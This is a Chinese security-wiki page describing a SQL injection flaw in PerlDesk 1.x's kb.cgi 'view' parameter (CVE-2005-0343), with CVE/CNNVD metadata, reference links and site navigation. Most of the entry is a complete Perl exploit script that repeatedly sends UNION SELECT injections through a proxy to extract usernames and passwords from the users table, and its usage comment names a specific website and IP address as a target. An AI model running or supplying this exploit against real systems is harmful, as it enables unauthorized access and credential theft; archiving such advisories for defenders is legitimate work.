子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

PerlDesk SQL注入漏洞

160

PerlDesk SQL注入漏洞

漏洞ID 1108434 漏洞类型 SQL注入
发布时间 2005-02-05 更新时间 2005-10-20
图片[1]-PerlDesk SQL注入漏洞-安全小百科CVE编号 CVE-2005-0343
 		图片[2]-PerlDesk SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200505-236
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/790
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-236
|漏洞详情
PerlDesk1.x存在SQL注入漏洞,远程攻击者可以通过view参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl

# Example:
# kb.cgi?view=0 UNION SELECT 1,3,password,username,3,7 FROM users

# Exploit is attached.
# ./pde.pl www.internethosting4u.com /perldesk/kb.cgi 148.244.150.58:80

use IO::Socket;

print '
########################################################
# PerlDesk exploit
#
# Usage: ./pdsploit.pl host path proxy
#
#
#
# Vunerability discovered by
#
# deluxe89 and Astovidatu [ www.security-project.org ]
#
#
#
# Special thanks to doc and WebDoctor´s
#
########################################################

';

if($#ARGV != 2)
{
       exit;
}

$host = $ARGV[0];
$path = $ARGV[1];
$proxy = $ARGV[2];
($addr, $port) = split(/:/, $proxy);

$offset = 0;

while(1)
{
       $value =
"view=0%20UNION%20SELECT%20'0','0',CONCAT('_P',password,'P_'),CONCAT('_U',username,'U_'),'0','0'%20FROM%20users%20LIMIT%20$offset,1";

       $socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => $addr, PeerPort => $port) || die "[-]
Proxy doesn't workn";
       print $socket "GET http://$host$path?$value
HTTP/1.1nHost: $hostnn";

       $user = '';
       $pass = '';
       while(defined(my $data = <$socket>))
       {
               if($data =~ m/_P(.*)P_/)
               {
                       $pass = $1;
               }
               if($data =~ m/_U(.*)U_/)
               {
                       $user = $1;
               }
       }

       if($user ne '' && $pass ne '')
       {
               print "$user:$passn";
       }
       else
       {
               die "[+] Finishedn";
       }

       $offset++;
}

# code by deluxe89 [ www.security-project.org ]

# milw0rm.com [2005-02-05]
|参考资料

来源:BID
名称:12471
链接:http://www.securityfocus.com/bid/12471
来源:SECUNIA
名称:12512
链接:http://secunia.com/advisories/12512
来源:XF
名称:perldesk-view-sql-injection(19245)
链接:http://xforce.iss.net/xforce/xfdb/19245
来源:MISC
链接:http://www.security-project.org/projects/board/showthread.php?p=5172#post5172
来源:BUGTRAQ
名称:20050207[SeProBugtraq]SQL-InjectioninPerlDesk1.x
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110782042532295&w;=2

相关推荐: TriggerTG TClanPortal Multiple SQL Injection Vulnerabilities

TriggerTG TClanPortal Multiple SQL Injection Vulnerabilities 漏洞ID 1096184 漏洞类型 Input Validation Error 发布时间 2005-08-09 更新时间 2005-08…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# sql
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4771
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1197
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 593
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 535
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 524
安全小百科-gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
gnubiff多个远程POP3协议漏洞
3年前 462
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020460
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012890
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011970
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010550
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666